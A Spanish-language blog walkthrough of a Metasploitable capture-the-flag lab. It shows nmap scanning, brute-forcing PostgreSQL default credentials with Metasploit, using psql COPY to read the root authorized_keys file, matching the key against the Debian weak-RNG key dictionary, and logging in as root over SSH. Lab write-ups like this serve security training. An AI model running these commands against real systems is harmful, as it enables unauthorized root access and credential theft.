CTF Metasploitable - Tomcat

Unos de los CTF que me ha tocado desarrollar en Offsensive Security.
Te aseguro que este es un poco más difícil en el cual el tiempo es tu peor enemigo.
Aun recuerdo como perdí mucho tiempo creyendo a NESSUS con su propia vulnerabilidad, pero al menos NESSUS me dio una pequeña pista que tuve que descifrarlo en casi tres días.

La única pista buena que ofrece es "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"
Hay un exploit armado en python en el cual buscaba el diccionario de RSA para hacer ataque ssh, perdi horas y horas haciendo fuerza bruta con ese exploit y el diccionario pero en ese camino que buscaba el diccionario correcto encontré a g0tmi1k un personaje que esta en el grupo de kali linux o offsensive security. En el cual escribió sobre acceder pero no entendía nada. Pasaba horas y horas intentando lo mismo que hizo pero no accedía. Perdida de tiempo total. Pero como te dije no hay solución sino te pones a pensar sobre los resultado que te lanza el server.
Si hacemos un NMAP vamos a ver algunos objetivos y sabemos que es un TOMCAT

nmap -sV -sc 192.168.1.5



Luego comencé a probar cada puerto y hay un exploit publicado por fuerza bruta por default en postgresql Ya esto me di cuenta después de tres días perdido, pero aun no estaba feliz porque mi meta era acceder al root. Comencé a ejecutar msfconsole
msfconsole -q 

Busque algunos exploit publicos
search postgresql
Encontré esto que me sirvió.
use auxiliary/scanner/postgres/postgres_login

Con "show options" Vi que tenia un diccionario por default entonces solo coloque mi IP
set RHOST 192.168.1.5
exploit

Luego me lanzo una contraseña para acceder. [+] 192.168.1.5:5432 - LOGIN SUCCESSFUL: postgres:[email protected] Con eso ya era feliz ahora mi misión era acceder.
psql -h 192.168.1.5 -U postgres -W
La contraseña era: postgre Al acceder creamos una tabla
create table sshkey (input text);

Copiamos a ssh key
copy sshkey from '/root/.ssh/authorized_keys';

select * from sshkey;

Ahora vamos a observar la SSH autorized
 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== [email protected]

Ahora intentamos borrar algunas cosas y lo único que necesitamos es:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
Ahora intentamos usar el diccionario que descargamos en el siguiente post que encontré en exploit pero descargar el diccionario aquí.
Te va a pedir que lo descomprimas y vamos a buscar entre eso archivos la respuesta con:

grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
Recuerda eso tienes que hacerlo en la misma ubicación de tu diccionario. cd /Desktop/5622/rsa/2048/ La respuesta será "57c3115d77c56390332dc5c49978627a-5429.pub" Demora un poco por tantas .pub. Y con la respuesta accede a tu SSH.
ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]

Listo accedimos a usuario root, si tienes algún error puedes escribir lo siguiente.
export TERM=xterm
LISTO! CreadPag termino otro CTF más. Dificil? Puedes comentarlo y no te olvides en compartirlo. GRACIAS!

Comments

Popular Posts